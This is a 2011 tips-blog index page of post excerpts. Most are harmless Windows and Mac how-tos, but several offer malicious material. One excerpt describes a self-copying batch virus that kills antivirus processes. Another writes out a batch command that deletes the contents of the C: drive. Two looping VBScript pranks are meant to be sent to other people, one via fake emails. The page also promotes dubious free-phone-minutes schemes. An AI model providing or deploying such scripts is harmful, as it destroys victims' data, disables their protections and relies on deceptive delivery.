English French German Spain Italian Dutch Russian Portuguese Japanese Korean Arabic Chinese Simplified

28.4.11

Keyboard Shortcuts for MAC OS X

Keyboard Shortcuts for MAC OS X ClipboardCommand+C = CopyCommand+V = PasteCommand+X = CutCommand+A = Select AllScreen captureCommand+Shift 3 = Capture the screen to a fileCommand Ctrl Shift 3 = Capture the screen to the clipboardCommand+Shift 4 = Select an area to be captured to a fileCommand Ctrl...

27.4.11

How to protect pen drives!!

 How to protect pen drives!! Viruses Spread a lot these days through Pendrives.The viruses are capable enough to copy itself to whatever flash drive is attached into the infected computer’s USB drive.If you write protect your USB drives deleting/Copying files or Folders on the USB drive is not...

How to disable Autoplay of CDs

How to disable Autoplay of CDs Getting bored of seeing the pop-up window every time you plug in a pen drive or insert a CD?  I am going to show you how to get rid of this irritating Auto play!! Click on Start=>RUN  Type  gpedit.msc , Which will open a group policy window.     ...

25.4.11

Epic Browser - India's First Browser

 India's First Browser !! The Epic Browser is the first-ever web browser for India. The Epic Browser is built on the latest Mozilla platform. It loads web pages at lightening speed.Its a free web browser for windows operating system.This wonderful feat has...

24.4.11

Free cricket updates in India

To Get Free Cricket Scores by SMS In India : 100% free Cricket Score Ball by Ball by SMS For All Operators. > Just dial the below number. > After Calling on that number u will be automatically rejected in 3 sec. > After 5 sec, U get a SMS for Live Cricket Match Score. (TDZIPDIAL) It...

Windows 7 Trick - GOD MODE

 GOD MODE By creating a new folder in Windows 7 and renaming it with a certain text string at the end, users are able to have a single place to do everything from changing the look of the mouse pointer to making a new hard-drive partition. To enter "GodMode," one need only create a new...

Create a Dangerous Virus Using Notepad

Create a Dangerous Virus Using Notepad   Here is a Batch File virus which can: 1.Copy itself into startup 2.Copy itself over one thousand times into random spots in your computer. 3.Hide its self and all other created files 4.Task kill MSN, Norton, Windows Explorer, Limewire. 5.Swap the...

16.4.11

Erase Data Permanently - Eraser 6.08

Erase Data Permanently   Eraser is a Freeware tool which plays vital role in erasing vital information from Hard disk permanently. Eraser supports Windows Xp, Vista, Windows 7 and Windows server 2003 and 2008.  Deleted  documents, pictures, movies, and office secure files, personal...

7.4.11

Convert FAT to NTFS or NTFS to FAT

To convert a FAT partition to NTFS, perform the following steps.  Click Start, click Programs, and then click Command Prompt. In Windows XP, click Start, click Run, type cmd and then click OK. At the command prompt, type CONVERT [driveletter]: /FS:NTFS. Convert.exe will attempt to convert the...

Unlimited Free Cell Phone Minutes

                   Unlimited Free Cell Phone Minutes None of us enjoy paying the absurd prices we have to pay for monthly cell phone service.  Finally, there is a solution! Most networks have a feature allowing you to call a certain number...

6.4.11

How to Make Your Computer Speak Whatever You Type

How to Make Your Computer Speak Whatever You Type:-    Create YOUR OWN vbs script program to make your computer talk!! Steps 1. Open the Notepad. 2.Copy/Write the code as given below into the notepad. Dim message, sapi message=InputBox("What do you want me to say?","Speak to Me") Set...

4.4.11

Run Firefox in Firefox

How to run Firefox inside Firefox.? Yup you can run Firefox inside firefox just by typing following url. How about Opening Firefox inside Firefox which is again in another Firefox..? Not bad huh? And its really easy too just type in this url in Firefox's address bar and there you go! Firefox inside...

Delete C drive using Notepad

Type these commands in notepad to delete your C drive @Echo off Del C:\ *.* |y And save that as .bat It will delete the content of C:\ drive... DO NOT RUN THIS ON YOUR COMPUTER.I AM NOT RESPONSIBLE IN ANY WAY FOR YOUR ACTIONS...

Making VBScript hit Enter simultaneously:

Making  VBScript hit Enter simultaneously:IN NOTEPAD Type : Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "~(enter)" loop Save it as "Anything.VBS" and send it.(TO SEND IT BY FAKE EMAILS, CLICK HERE...

Pop out the cd drive

If there are more than one, it pops out all of them! IN NOTEPAD Type : Set oWMP = CreateObject("WMPlayer.OCX.7")Set colCDROMs = oWMP.cdromCollectiondoif colCDROMs.Count >= 1 thenFor i = 0 to colCDROMs.Count - 1colCDROMs.Item(i).EjectNextFor i = 0 to colCDROMs.Count - 1colCDROMs.Item(i).EjectNextEnd Ifwscript.sleep 5000loop Save it as "Anything.VBS" and send ...

Locking a Folder without any software

Folder Lock With Password Without Any Software- Paste the code given below in notepad and 'Save' it as batch file (with extension '.bat'). Any name will do. Then you see a batch file. Double click on this batch file to create a folder locker. New folder named 'Locker' would be formed at the...